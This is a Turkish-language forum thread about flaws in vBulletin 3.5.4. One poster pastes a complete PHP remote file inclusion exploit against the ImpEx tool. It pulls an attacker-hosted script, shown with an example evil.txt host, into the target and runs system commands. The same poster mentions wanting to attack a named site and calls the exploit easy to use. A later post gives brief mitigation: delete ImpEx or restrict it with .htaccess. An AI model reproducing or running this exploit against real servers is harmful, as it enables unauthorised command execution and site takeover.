Vbulletin V3.5.4

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    manglerman
    manglerman's avatar
    Kayıt Tarihi: 30/Aralık/2003
    Erkek
    vBulletin v3.5.4 forumuunun açığı varmı bilen varsa yardımcı olursa sevinirim. güvenlik için soruyorum açmayı düşünüyorum şu anda holyone denyolaunchhhla denedim pek bi verim alamadım kabul etmiyo 20 tane açtım saniye başı atıyolar ama 2 dakkada anca 20 post oldu. yani denyolaunchla saldıramazlar :D başka bi yöntem olurmu

    türk kızlarından sabun yapalım, rus kızları elini yıkasın.:)
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kroo
    kroo's avatar
    Kayıt Tarihi: 15/Mayıs/2006
    Erkek
    install açığı vardı pek nadir onu da değiştirirsen bişi olmas

    bu dünyada da öbür dünyada da yanmanın yolu plajdan geçer
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    denizhan
    denizhan's avatar
    Kayıt Tarihi: 19/Eylül/2005
    Erkek
    kardes yeni cikmis bir acigi varmis...

    guzel yani halada patc calismasi yokmus..

    3-5-4 / 3-5-3 / 3-5-2 de calisiyormus

    ben gen***turks.com a saldircaktim ama orada bunu kullanmamislar..

    /*
    vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
    Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
    url: http://www.xorcrew.net/ReZEN

    example:
    turl: http://www.target.com/impex/ImpExData.php?systempath=
    hurl:http://www.pwn3d.com/evil.txt?

    */

    $cmd = $_POST["cmd"];
    $turl = $_POST["turl"];
    $hurl = $_POST["hurl"];

    $form= "
    "
    ."turl:
    value=\"".$turl."\">
    "
    ."hurl:
    value=\"".$hurl."\">
    "
    ."cmd:
    value=\"".$cmd."\">
    "
    .""

    ."

    ";

    if (!isset($_POST['submit']))
    {

    echo $form;

    }else{

    $file = fopen ("test.txt", "w+");

    fwrite($file, "system(\"echo ++END++\"); ?>");
    fclose($file);

    $file = fopen ($turl.$hurl, "r");
    if (!$file) {
    echo "

    Unable to get output.\n";
    exit;
    }

    echo $form;

    while (!feof ($file)) {
    $line .= fgets ($file, 1024)."
    ";
    }
    $tpos1 = strpos($line, "++BEGIN++");
    $tpos2 = strpos($line, "++END++");
    $tpos1 = $tpos1+strlen("++BEGIN++");
    $tpos2 = $tpos2-$tpos1;
    $output = substr($line, $tpos1, $tpos2);
    echo $output;

    }
    ?>


    D ё И Į Ż / Kalbimi hack"leyebilirsin ama ruhumu asla. - Türkler warez"e düşene vurmazlar. - Hardware ci olup teknolojinin cefasını çekeceğime, programmer olur sefasını sürerim.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    manglerman
    manglerman's avatar
    Kayıt Tarihi: 30/Aralık/2003
    Erkek
    denizhan kardei bu açık nerde tam olarak anlayamadım veya nasıl kapatabilirim bir yardımcı olabilirmisin

    türk kızlarından sabun yapalım, rus kızları elini yıkasın.:)
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    denizhan
    denizhan's avatar
    Kayıt Tarihi: 19/Eylül/2005
    Erkek
    bu acigi http://www.xorcrew.net/ReZEN/ adresinde cok guzel anlatmislar..

    http://www.xorcrew.net/ReZEN/images/freeillwillscreeny.jpg buda bu acik ile yapilan..

    acikcasi biraz sansli olmaniz lazim impex tool herkez tarafindan kullanilmiyor.. bir database den vbulleting in kendi database ine bilgileri cekmek icin gelistirdigi bir teknologi. kullanici adlari adres etc.

    ama denemenizde fayfa var.. kullanimi cok basit.

    acigi kapatmak icin bir yama henuz yayinlanmamis.. en azindan sitede oyle yaziyo ve vbulleting dede bu tarzda yayinlanmis bir haber gormedim.. fakat impex i kullanmassan bu acik ile dusurulmezsin.. yada .htaccess kullan zira index ile ayni klasorde degiller.. ama kesin cozum bu araci kullandiktan sonra impex i silmen..

    ii calismalar kolay gelsin.

    D ё И Į Ż / Kalbimi hack"leyebilirsin ama ruhumu asla. - Türkler warez"e düşene vurmazlar. - Hardware ci olup teknolojinin cefasını çekeceğime, programmer olur sefasını sürerim.
Toplam Hit: 2230 Toplam Mesaj: 5